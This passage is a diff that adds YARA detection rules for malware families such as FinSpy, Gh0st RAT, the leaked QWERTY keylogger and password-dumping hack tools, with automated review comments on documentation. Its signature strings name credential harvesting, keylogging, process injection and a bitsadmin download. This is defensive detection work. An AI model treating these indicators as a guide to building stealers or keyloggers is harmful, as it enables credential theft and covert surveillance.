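Review bot: The first, second and fourth strings of `EzcobStrings` are character sequences interleaved with a `\x12` byte, and nothing in the rule says what that encoding is, so a maintainer cannot tell whether the pattern is deliberate or a transcription error. A one-line comment above the block would settle it, e.g. `// as stored in the sample: characters interleaved with 0x12 bytes (not a typo)` — the wording is a guess, since the rule does not show where the encoding comes from, so the author should confirm it. The `any of them` at the bottom is also indented one column less than the rest of the block.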
diff --git a/malware/F0xy.yar b/malware/F0xy.yar
new file mode 100644
index 0000000..06c0965
--- /dev/null
+++ b/malware/F0xy.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ws_f0xy_downloader {
+  meta:
+    description = "f0xy malware downloader"
+    author = "Nick Griffin (Websense)"
+
+  strings:
+    $mz="MZ"
+    $string1="bitsadmin /transfer"
+    $string2="del rm.bat"
+    $string3="av_list="
+  
+  condition:
+    ($mz at 0) and (all of ($string*))
+}
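Review bot: The `meta` section of `ws_f0xy_downloader` carries only `description` and `author`; unlike the neighbouring rules it has no `date`, `reference` or sample hash, so there is no way to tell which sample or report it was derived from or how old it is. Adding `date = "<YYYY/MM/DD>"` and `reference = "<report URL>"` (values to be supplied by the author) would bring it in line with the rest of the set.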
diff --git a/malware/FakeM.yar b/malware/FakeM.yar
new file mode 100644
index 0000000..cb1ed3a
--- /dev/null
+++ b/malware/FakeM.yar
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule HTMLVariant : FakeM Family HTML Variant
+{
+	meta:
+		description = "Identifier for html variant of FAKEM"
+		author = "Katie Kleemola"
+		last_updated = "2014-05-20"
+	
+	strings:
+		// decryption loop
+		$s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 }
+		//mov byte ptr [ebp - x] y, x: 0x10-0x1 y: 0-9,A-F
+		$s2 = { C6 45 F? (3?|4?) }
+
+	condition:
+		$s1 and #s2 == 16
+
+}
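Review bot: The condition `$s1 and #s2 == 16` in `HTMLVariant` pins an exact occurrence count, and the only explanation is the terse comment on `$s2`; a reader has to reconstruct that the sixteen `mov byte ptr [ebp-x]` stores (x from 0x10 down to 0x1, values in 0-9/A-F) are the sixteen bytes of a table built on the stack, and that any other count is treated as not this variant. A comment next to the condition such as `// exactly 16 single-byte stores = one per byte of the 16-byte hex-character table; another count means a different variant` would capture that, if that reading is right. It is also worth stating whether `>= 16` was considered, since one unrelated `C6 45 F? 3?` sequence elsewhere in the file makes the rule miss.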
diff --git a/malware/FinSpy.yar b/malware/FinSpy.yar
new file mode 100644
index 0000000..189aa41
--- /dev/null
+++ b/malware/FinSpy.yar
@@ -0,0 +1,138 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FinSpy_2
+{
+    meta:
+        description = "FinFisher FinSpy"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $password1 = /\/scomma kbd101\.sys/ wide ascii
+        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+        $password3 = /\/scomma excel2010\.part/ wide ascii
+        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+        $password6 = /\/scomma MSN2010\.dll/ wide ascii
+        $password7 = /\/scomma Firefox\.base/ wide ascii
+        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+        $password9 = /\/scomma IE7setup\.sys/ wide ascii
+        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+        $password11 = /\/scomma office2007\.cab/ wide ascii
+        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+        $password13 = /\/scomma outlook2007\.dll/ wide ascii
+        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
+        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+        $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+        $mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+        $mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
+        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+        $versions1 = /(f)inspyv2/ nocase
+        $versions2 = /(f)inspyv4/ nocase
+
+        $bootkit1 = /(b)ootkit_x32driver/
+        $bootkit2 = /(b)ootkit_x64driver/
+
+        $typo1 = /(S)creenShort Recording/ wide
+
+        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+    condition:
+        8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx
+}
+
+rule FinSpy
+{
+    meta:
+        description = "FinFisher FinSpy"
+        author = "AlienVault Labs"
+
+    strings:
+        $filter1 = "$password14"
+        $filter2 = "$screenrec7"
+        $filter3 = "$micrec"
+        $filter4 = "$skyperec3"
+        $filter5 = "$mouserec2"
+        $filter6 = "$driver"
+        $filter7 = "$janedow2"
+        $filter8 = "$bootkit2"
+
+        $password1 = /\/scomma kbd101\.sys/ wide ascii
+        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+        $password3 = /\/scomma excel2010\.part/ wide ascii
+        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+        $password6 = /\/scomma MSN2010\.dll/ wide ascii
+        $password7 = /\/scomma Firefox\.base/ wide ascii
+        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+        $password9 = /\/scomma IE7setup\.sys/ wide ascii
+        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+        $password11 = /\/scomma office2007\.cab/ wide ascii
+        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+        $password13 = /\/scomma outlook2007\.dll/ wide ascii
+        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
+        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+        //$skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+        //$mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+        //$mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
+        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+        //$versions1 = /(f)inspyv2/ nocase
+        //$versions2 = /(f)inspyv4/ nocase
+
+        $bootkit1 = /(b)ootkit_x32driver/
+        $bootkit2 = /(b)ootkit_x64driver/
+
+        $typo1 = /(S)creenShort Recording/ wide
+
+        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+    condition:
+        (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*)
+}
+
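Review bot: The `$filter1`…`$filter8` literals in rule `FinSpy` are undocumented, and nothing explains why a file containing the text `$password14` should be excluded; the plausible reading is that they keep the rule from matching copies of this ruleset itself (the literal `$filter1 = "$password14"` appears in this very file), but that is an inference. A comment at the top of that strings block, e.g. `// exclusion: literal identifier names from this ruleset, so the rule does not fire on copies of its own source` (to be confirmed by the author), would save the next maintainer the guesswork. Separately, most of the `$password*`, `$screenrec*` and `$janedow*` patterns in both rules contain no regex constructs beyond escaping, so plain strings with `wide ascii` would scan faster and read more clearly; the `(X)` first-character groups appear to exist only to defeat self-matching, which the same comment should say, since a plain-string conversion would need to preserve that property.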
diff --git a/malware/FiveEyes.yar b/malware/FiveEyes.yar
new file mode 100644
index 0000000..bed7b65
--- /dev/null
+++ b/malware/FiveEyes.yar
@@ -0,0 +1,241 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+/* FIVE EYES ------------------------------------------------------------------------------- */
+
+rule FiveEyes_QUERTY_Malwareqwerty_20121 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
+	strings:
+		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20121.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
+	condition:
+		9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_sys {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
+	strings:
+		$s0 = "20123.dll" fullword ascii
+		$s1 = "kbdclass.sys" fullword wide
+		$s2 = "IoFreeMdl" fullword ascii
+		$s3 = "ntoskrnl.exe" fullword ascii
+		$s4 = "KfReleaseSpinLock" fullword ascii
+	condition:
+		all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
+	strings:
+		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
+		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
+		$s2 = "<commands/>" fullword ascii
+		$s3 = "</version>" fullword ascii
+		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
+		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
+		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
+		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
+		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s9 = "<minorType>0</minorType>" fullword ascii
+		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
+		$s11 = "</comments>" fullword ascii
+		$s12 = "<comments>" fullword ascii
+		$s13 = "<majorType>1</majorType>" fullword ascii
+		$s14 = "<files>None</files>" fullword ascii
+		$s15 = "<poc>Erebus</poc>" fullword ascii
+		$s16 = "</plugin>" fullword ascii
+		$s17 = "<team>None</team>" fullword ascii
+		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
+		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
+		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
+	condition:
+		14 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_dll {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "89504d91c5539a366e153894c1bc17277116342b"
+	strings:
+		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
+		$s1 = "20121.dll" fullword ascii
+	condition:
+		all of them
+}
+rule FiveEyes_QUERTY_Malwareqwerty_20123 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
+	strings:
+		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
+		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
+		$s2 = "<name>20123.sys</name>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
+		$s5 = "<platform type=\"1\">" fullword ascii
+		$s6 = "</plugin>" fullword ascii
+		$s7 = "</pluginConfig>" fullword ascii
+		$s8 = "<pluginConfig>" fullword ascii
+		$s9 = "</platform>" fullword ascii
+		$s10 = "</lpConfig>" fullword ascii
+		$s11 = "<lpConfig>" fullword ascii
+	condition:
+		9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_dll {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
+	strings:
+		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" fullword wide
+		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" fullword wide
+		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
+		$s3 = "- Log Used (number of windows) - %d" fullword wide
+		$s4 = "- Log Limit (number of windows) - %d" fullword wide
+		$s5 = "Process or User Default Language" fullword wide
+		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
+		$s7 = "- Logging of keystrokes is switched ON" fullword wide
+		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
+		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
+		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
+		$s11 = "FAILED to get Qwerty Status" fullword wide
+		$s12 = "- Successfully retrieved Log from Implant." fullword wide
+		$s13 = "- Logging of all Windows is toggled ON" fullword wide
+		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
+		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
+		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
+		$s17 = "The implant failed to return a valid status" fullword ascii
+		$s18 = "- Log files were NOT generated!" fullword wide
+		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
+		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
+	condition:
+		10 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
+	strings:
+		$s0 = "This PPC gets the current keystroke log." fullword ascii
+		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
+		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
+		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
+		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
+		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
+		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
+		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
+		$s8 = "<definition>display help for this function</definition>" fullword ascii
+		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
+		$s10 = "Set the log limit (in number of windows)" fullword ascii
+		$s11 = "<example>qwgetlog</example>" fullword ascii
+		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
+		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
+		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
+		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
+		$s16 = "<command id=\"32\">" fullword ascii
+		$s17 = "<command id=\"3\">" fullword ascii
+		$s18 = "<command id=\"7\">" fullword ascii
+		$s19 = "<command id=\"1\">" fullword ascii
+		$s20 = "<command id=\"4\">" fullword ascii
+	condition:
+		10 of them
+}
+
+rule FiveEyes_QUERTY_Malwareqwerty_20120 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
+	strings:
+		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20120.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
+	condition:
+		all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
+	strings:
+		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
+		$s1 = "<message>Failed to get File Time</message>" fullword ascii
+		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
+		$s3 = "<message>Failed to set File Time</message>" fullword ascii
+		$s4 = "</commands>" fullword ascii
+		$s5 = "<commands>" fullword ascii
+		$s6 = "</version>" fullword ascii
+		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
+		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
+		$s9 = "</error>" fullword ascii
+		$s10 = "<message>Invalid File Size</message>" fullword ascii
+		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
+		$s12 = "<message>File Size Mismatch</message>" fullword ascii
+		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
+		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
+		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
+		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
+		$s18 = "<minorType>0</minorType>" fullword ascii
+		$s19 = "<code>00001002</code>" fullword ascii
+		$s20 = "<code>00001001</code>" fullword ascii
+	condition:
+		12 of them
+}
diff --git a/malware/Gh0st.yar b/malware/Gh0st.yar
new file mode 100644
index 0000000..7689ffc
--- /dev/null
+++ b/malware/Gh0st.yar
@@ -0,0 +1,70 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_WIN_Gh0st_ver
+{
+meta:
+   author = "@BryanNolen"
+   date = "2012-12"
+   type = "APT"
+   version = "1.1"
+   ref = "Detection of Gh0st RAT server DLL component"
+   ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"
+ strings:  
+   $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
+   $capability = "GetClipboardData"
+   $capability1 = "capCreateCaptureWindowA"
+   $capability2 = "CreateRemoteThread"
+   $capability3 = "WriteProcessMemory"
+   $capability4 = "LsaRetrievePrivateData"
+   $capability5 = "AdjustTokenPrivileges"
+   $function = "ResetSSDT"
+   $window = "WinSta0\\Default"
+   $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64}    /* $magic = "Gh0st" */
+ condition:
+   all of them
+}
+
+rule Gh0st
+{
+    meta:
+        description = "Gh0st"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $ = /(G)host/
+        $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
+        $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
+        $ = /(%)s\\shell\\open\\command/
+        $ = /(G)etClipboardData/
+        $ = /(W)riteProcessMemory/
+        $ = /(A)djustTokenPrivileges/
+        $ = /(W)inSta0\\Default/
+        $ = /(#)32770/
+        $ = /(#)32771/
+        $ = /(#)32772/
+        $ = /(#)32774/
+
+    condition:
+        all of them
+}
+
+rule gh0st
+
+{
+
+meta:
+	author = "https://github.com/jackcr/"
+
+   strings:
+      $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
+      $b = "Gh0st Update"
+
+   condition:
+      any of them
+
+}
diff --git a/malware/Gholee.yar b/malware/Gholee.yar
new file mode 100644
index 0000000..f36c503
--- /dev/null
+++ b/malware/Gholee.yar
@@ -0,0 +1,55 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule gholeeV1
+{
+    meta:
+	 Author = "@GelosSnake"
+    	 Date = "2014/08"
+    	 Description = "Gholee first discovered variant "
+	 Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
+
+    strings:
+    	 $a = "sandbox_avg10_vc9_SP1_2011"
+    	 $b = "gholee"
+
+    condition:
+    	 all of them
+}
+
+rule gholeeV2
+{
+   meta:
+	Author = "@GelosSnake"
+	Date = "2015-02-12"
+    	Description = "Gholee first discovered variant "
+	Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
+
+   strings:
+	$string0 = "RichHa"
+	$string1 = "         (((((                  H" wide
+	$string2 = "1$1,141<1D1L1T1\\1d1l1t1"
+	$string3 = "<8;$O' "
+	$string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
+	$string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
+	$string6 = "urn:schemas-microsoft-com:asm.v1"
+	$string7 = "8.848H8O8i8s8y8"
+	$string8 = "wrapper3" wide
+	$string9 = "pwwwwwwww"
+	$string10 = "Sunday"
+	$string11 = "YYuTVWh"
+	$string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
+	$string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
+	$string15 = "wrapper3 Version 1.0" wide
+	$string16 = "77A779"
+	$string17 = "<C<G<M<R<X<"
+	$string18 = "9 9-9N9X9s9"
+
+    condition:
+	18 of them
+}
+
diff --git a/malware/Glasses.yar b/malware/Glasses.yar
new file mode 100644
index 0000000..ede7bba
--- /dev/null
+++ b/malware/Glasses.yar
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule GlassesCode : Glasses Family 
+{
+    meta:
+        description = "Glasses code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+        
+    strings:
+        $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 }
+        $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA }
+        
+    condition:
+        any of them
+}
+
+rule GlassesStrings : Glasses Family
+{
+    meta:
+        description = "Strings used by Glasses"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+        
+    strings:
+        $ = "thequickbrownfxjmpsvalzydg"
+        $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
+        $ = "\" target=\"NewRef\"></a>"
+ 
+    condition:
+        all of them
+
+}
+
+rule Glasses : Family
+{
+    meta:
+        description = "Glasses family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+   
+    condition:
+        GlassesCode or GlassesStrings
+        
+}
diff --git a/malware/Grozlex.yar b/malware/Grozlex.yar
new file mode 100644
index 0000000..48eb014
--- /dev/null
+++ b/malware/Grozlex.yar
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Grozlex : Stealer
+{
+	meta:
+		author="Kevin Falcoz"
+		date="20/08/2013"
+		description="Grozlex Stealer - Possible HCStealer"
+		
+	strings:
+		$signature={4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E}
+	
+	condition:
+		$signature
+}
diff --git a/malware/HackTools.yar b/malware/HackTools.yar
new file mode 100644
index 0000000..30913a3
--- /dev/null
+++ b/malware/HackTools.yar
@@ -0,0 +1,3241 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule PwDump
+{
+	meta:
+		description = "PwDump 6 variant"
+		author = "Marc Stroebel"
+		date = "2014-04-24"
+		score = 70
+	strings:
+		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
+		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
+		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
+	condition:
+		all of them
+}
+
+rule PScan_Portscan_1 {
+	meta:
+		description = "PScan - Port Scanner"
+		author = "F. Roth"
+		score = 50
+	strings:
+		$a = "00050;0F0M0X0a0v0}0"
+		$b = "vwgvwgvP76"
+		$c = "Pr0PhOFyP"
+		condition:
+		all of them
+}
+
+rule HackTool_Samples {
+	meta: 
+		description = "Hacktool"
+		score = 50
+	strings:
+		$a = "Unable to uninstall the fgexec service"
+		$b = "Unable to set socket to sniff"
+		$c = "Failed to load SAM functions"
+		$d = "Dump system passwords"
+		$e = "Error opening sam hive or not valid file"
+		$f = "Couldn't find LSASS pid"
